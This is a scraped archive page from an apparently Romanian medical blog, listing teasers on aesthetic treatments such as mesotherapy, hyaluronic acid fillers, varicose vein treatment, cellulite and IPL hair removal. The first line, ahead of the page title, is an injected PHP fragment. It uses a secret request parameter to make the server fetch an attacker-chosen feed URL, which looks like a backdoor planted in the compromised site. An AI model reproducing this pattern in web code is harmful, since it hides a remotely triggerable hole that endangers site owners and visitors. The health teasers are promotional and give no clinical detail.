isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Estetica - MedicAS

Arhiva pentru categoria 'Estetica'

Ingrijirea tenului

25 March, 2009

Toti vorbim despre criza, unii o si traim la modul propriu… Ne mai preocupa frumusetea si cum sa avem un ten frumos si ingrijit cind vremurile sunt cum sunt? Raspunsul ar trebui sa fie da, caci, femei fiind, sau altfel spus sexul frumos, putem gasi timp si mai ales resurse , in camara sau cutia cu legume din frigider. Preocuparile pentru estetica nu presupun neaparat si sume mari care trebuie investite…doar putina informare si…creativitate. Deci, succes doamnelor !


O tehnica nonchirurgicala care ne face sa scapam de inestetica celulita? Si sa fim mai slabe? Si fara riduri? Da, exista. Si se numeste mezoterapie. Si chiar daca se foloseste in multe patologii, mezoterapia estetica ne ajuta sa fim mai frumoase. Si binenteles mai admirate. Cititi mai departe in ce consta tehnica mezoterapiei si care sunt indicatiile sale in estetica.


Pentru doamne, şi nu numai, o nouă metodă medicală de înfrumuseţare este injectarea de acid hialuronic. Iată acum că problemele de estetică precum ridurile de expresie, cele de la nivelul gâtului au o rezolvare simplă, cu efecte ce durează câteva luni.


Cine nu-şi doreşte să fie frumoasă şi sănătoasă? O problemă de estetică, ce ne face să nu mai purtăm fustiţe la modă şi să trecem la clasicii pantaloni, o constituie apariţia de varice. O problemă rezolvabilă acum, chiar şi intr-o zi, datorită tehnicilor şi aparatelor moderne de investigaţii şi tratament.


Celulita nu este un companion placut in viata. Fericirea incepe cu senzatia de bine, iar aceasta incepe cu estetica si sanatatea corpului nostru. Pentru ca este minunat sa faci sport regulat si sa te simti bine, sa fii sanatos si sa uiti definitiv de fosta celulita.


Epilare definitivă

20 March, 2008

Pilozitatea abundentă este uneori o problemă de estetică. Putem uita acum de ceara de epilat şi strânsul din dinţi la saloanele de cosmetică datorită unei tehnici moderne de epilare definitivă: fotiterapia cu lumină intens pulsată (IPL). Citiţi despre acest tratament nedureros mai jos şi uitaţi de toate neplăcerile de până acum.


Friptură cu cartofi prăjiţi la ora 22? Da, sună bine. Nu şi pentru siluetă. Obezitatea nu este doar o problemă de estetică, ci şi una de sănătate, constituind un factor de risc pentru o serie de boli.
Depinde doar de noi să ne controlăm şi să ne menţinem greutatea ideală. Cum? Citiţi mai departe…


 
 

Newsletter

Loading... Loading...
 
 

Aceasta este arhiva articolelor din categoria Estetica.